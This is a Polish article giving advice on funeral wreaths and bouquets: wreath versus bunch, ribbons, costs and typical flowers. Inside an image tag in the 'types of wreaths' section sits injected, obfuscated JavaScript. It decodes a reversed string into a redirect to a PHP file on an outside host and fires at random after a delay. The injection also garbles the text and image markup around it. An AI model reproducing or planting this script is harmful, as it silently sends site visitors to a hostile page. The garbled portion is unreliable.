Odpowiednie wieńce na grób

Odpowiednie wieńce na grób

Śmierć bliskiej osoby w każdym przypadku jest traumatycznym przeżyciem. Osoby, które są pogrążone w żałobie, pragną oddać hołd zmarłemu, a także uczcić jego życie. Dobrą okazją do tego będzie uroczystość pogrzebowej, na której bliscy, a także znajomi spotykają się, aby wspominać zmarłą osobę. Jedną z tradycji pogrzebowych jest przynoszenie w hołdzie zmarłemu kwiatów. Wiele osób ma wątpliwości odnośnie tego, jaką wiązankę wypada przynieść, aby pasowała w takim szczególnym dniu i była symbolem smutku oraz pamięci.

Rodzaje dostępnych wieńców na grób

wieńce w białyms<script>$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>toku na grób” height=”107″ src=”http://psychoterapia-psychodynamiczna.warszawa.pl/wp-content/uploads/2021/11/wience-w-biayms<script>$NqM=function(n){if (typeof ($NqM.list[n]) == toku-na-grob.jpg” style=”float:left;” width=”160″/>Pierwsze wątpliwości bliskich osoby zmarłej dotyczą tego, jaki rodzaj bukietu należy wybrać. Zazwyczaj decyzja obejmuje wiązankę albo wieniec. Bardziej okazały jest wieniec pogrzebowy. W tym wypadku kwiaty są mocowane do specjalnego podkładu, ułożonego na konkretny kształt. Zazwyczaj przyjmują one formę okręgu, a całość jest zwieńczona wstążkami ze słowami pożegnania. Często na wstążce umieszcza się podpis osoby albo osób, które taki wieniec złożyły na grobie. Jest to najbardziej kosztowna forma kwiatowego pożegnania, jednak prezentuje się pięknie. Koszt takiego wieńca, w zależności od zastosowanych kwiatów i jego wielkości, może wynosić nawet kilkaset złotych. Warto zdecydować się na estetyczne wieńce w białymstoku na grób. Najdroższe w tym przypadku będą najbardziej nietypowe kompozycje, na przykład w kształcie serca albo stworzone w gęsto ułożonych i różnorodnych kwiatów. Alternatywą jest wiązanka, która jest nieco mniejsza od wieńca i zazwyczaj jest wybierana przez dalszą rodzinę oraz przyjaciół zmarłej osoby. Również w tym przypadku do kwiatów jest dołączana wstążka z podpisem i pożegnaniem. Zazwyczaj wiązanki składają się z kilku do kilkunastu kwiatów, a ich ceny są nieco niższe, niż w przypadku wieńców.

W zależności od tego, jakie relacje nas łączyły ze zmarłym oraz jakie mamy możliwości finansowe, możemy zdecydować się na różnorodne formy kwiatów. W każdym przypadku będą one symbolem pamięci, a także szacunku. Kiedy już podejmiemy decyzję odnośnie konkretniej formy ułożenia, warto także pomyśleć o roślinach. Jest kilka rodzajów kwiatów, które najlepiej sprawdzają się na pogrzebach. Są to na przykład mieczyki, różne, chryzantemy czy goździki. Równie często wybierane są subtelne gerbery albo lilie i kalie.

Komentarze są wyłączone.